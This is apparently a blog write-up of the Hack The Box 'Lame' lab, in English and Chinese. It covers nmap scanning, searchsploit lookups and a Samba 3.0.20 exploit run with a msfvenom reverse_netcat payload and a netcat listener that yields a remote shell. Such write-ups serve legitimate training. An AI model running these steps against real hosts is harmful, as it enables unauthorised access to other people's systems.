[Hack The Box] Lame- writeup

💀 OS: linux 💀 Difficulty: easy 💀 Release date: 2017-05-15 💀 Vulnerability : Injection, CMS Exploit

Scanning and Enumeration:

nmap -sC -sV 10.10.10.3

nmap options
-O <Enable OS detection>
-sC <Run default scripts>
-sV <Probe open ports to determine service/version info>
-oA <Output to all format>
-p- <Scan all ports>
//fullscan: sudo nmap -p- -sC -sV -O -oA fullscan 10.10.10.3
//quickscan: sudo nmap -sC -sV -O -oA quickscan 10.10.10.3

Enumeration:

  • ftp (port:21, version: vsftpd 2.3.4)
  • ssh (port:22, version:OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0))
  • netbios-ssn (port:139, version:Samba smbd 3.X – 4.X (workgroup: WORKGROUP))
  • netbios-ssn (port:445, version:Samba smbd 3.0.20-Debian (workgroup: WORKGROUP))
  • distccd (port:3632, version: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

ftp

searchsploit vsftpd 2.3.4


github找到這個exploit
https://github.com/ahervias77/vsftpd-2.3.4-exploit
但是這份exploit無法使用

ssh

searchsploit ssh OpenSSH 4.7

samba

searchsploit samba 3.0.20


github找到這個exploit
https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py

Usage:
1.get your LHOST: ip addr|grep tun0 
2.Generate the reverse netcat buffer payload: msfvenom -p cmd/unix/reverse_netcat LHOST=<Your LHOST> LPORT=<Specify any port> -f python 
3.Replace line 8 to 15 with the generated payload from msfvenom
4.pip install pysmb

exploit

nc -nlvp <Your LPOST>
python3 exploit-smb-3.0.20.py

Reflections

這是我在HTB購買VIP後完成的第一台Lab,也因為OSCP正式考試中不能使用msf這讓我在練習的時候也這麼要求自己。
這讓我學到該如何上網搜索exploit利用,也學習到msfvenom,netcat等工具的應用。
另外在掃瞄ports時如果時間允許可以進行完整掃描,或許可以掃出一般掃描掃不到的東西出來。

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *